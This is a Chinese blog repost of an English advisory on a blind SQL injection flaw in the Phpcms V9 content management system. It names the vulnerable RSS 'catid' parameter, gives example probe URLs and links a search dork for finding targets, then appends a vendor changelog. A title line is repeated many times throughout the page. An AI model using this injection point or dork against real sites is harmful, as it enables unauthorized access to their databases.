Phpcms V9 网站管理系统 SQL 盲注入漏洞

=================================================================
Phpcms V9 BLind SQL Injection Vulnerability
非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了……
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Software: Phpcms V9
        Vendor: www.Phpcms.cn
        Vuln Type: BLind SQL Injection
        Download link: http://www.Phpcms.cn/2010/1229/326.html
        Author: eidelweiss
        contact: eidelweiss[at]windowslive[dot]com
        Home: www.eidelweiss.info
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Google Dork:
            http://www.exploit-db.com/ghdb/3676/    //check here ^_^
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        References:
            http://eidelweiss-advisories.blogspot.com/2011/01/Phpcms-v9-blind-sql-injection.html
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
            exploit & p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] index.php?m=content&c=rss&catid=[valid catid]
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

            Example p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] http://host/index.php?m=content&c=rss&catid=10  <= True
        [!] http://host/index.php?m=content&c=rss&catid=-10 <= False
        [+] http://host/index.php?m=content&c=rss&catid=5   <= show MySQL Error (table)
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

    Phpcms V9 网站管理系统 SQL 盲注入漏洞,Phpcms V9 BLind SQL Injection Vulnerability,Phpcms V9 网站内容管理系统SQL注入,Phpcms V9 网站管理系统SQL盲注。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPCMS V9采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。PHPCMS V9在保留2008版的特点的同时,对新版本作出重大的创新,为此我们做出了巨大的努力,希望能为更多的站长提供优质的建站系统PHPCMS V9目前已提供文章、图片、下载等内容模型,在此基础上可非常方便的扩展出信息、房产、交友、点评等功能。已有的模块有:会员、在线充值、全站搜索、评论、专题、新闻心情、短消息、投票、友情链接、公告、附件管理、数据源模块、广告、采集、表单向导、手机门户等模块。 版本V9.3.4 功能变更及bug修正说明: 1. 修复漏洞:支付模块过滤不严格导致SQL注入 2. 修正后台登陆过期时间问题 3. 修复遍历上级目录漏洞 4. 防止注入漏洞。 5. 修复:后台管理员密码泄露后,可能存在的SQL注入 6. phpsso后台弱密码,可能导致用户资料被删除 7. 修复plugin 在 register_global=ON 时,存在包含任意文件的漏洞 8. 修复漏洞:cookie被二次利用,导致SQL注入 9. 修复:获取cookie和读取cookie不严格,导致数据库SQL注入 10. 增强后台权限验证 11. 优化验证码功能 12. 优化:防止注册机重复利用验证码注册 13. 优化附件安全 升级方法: 一、后台自动升级 进入管理后台--扩展--在线升级 直接升级即可! 二、下载升级包按顺序手工升级

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值